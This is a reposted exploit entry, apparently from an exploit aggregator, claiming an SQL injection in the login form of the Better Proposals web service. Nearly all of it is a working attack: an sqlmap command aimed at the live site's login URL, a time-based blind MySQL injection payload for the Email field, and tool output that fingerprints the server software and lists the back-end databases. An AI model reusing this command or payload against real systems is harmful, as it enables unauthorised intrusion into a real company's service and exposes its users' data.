Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021070161

Below is a copy:

Better Proposals: Online Proposal Software | SQL Injection
# Exploit Title: Better Proposals: Online Proposal Software | SQL Injection Vulnerability
# Author:  
# Tested On: Kali Linux
# sqlmap -u "https://betterproposals.io/2/login/" --form --dbs --batch
---------------------------------------------------------------------------------------------------

https://betterproposals.io/2/login/

---
Parameter: Email (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: Email=rLlf' AND (SELECT 5491 FROM (SELECT(SLEEP(5)))kKlT) AND 'hbrR'='hbrR&Password=&login=Sign In&RememberMe=1
---

the back-end DBMS is MySQL
web application technology: Apache 2.4.39, PHP 5.6.40
the back-end DBMS: MySQL >= 5.0.12

available databases [8]:
[+] better_blog
[+] information_schema
[+] innodb
[+] mysql
[+] performance_schema
[+] rpawsuebaq
[+] sys
[+] tmp
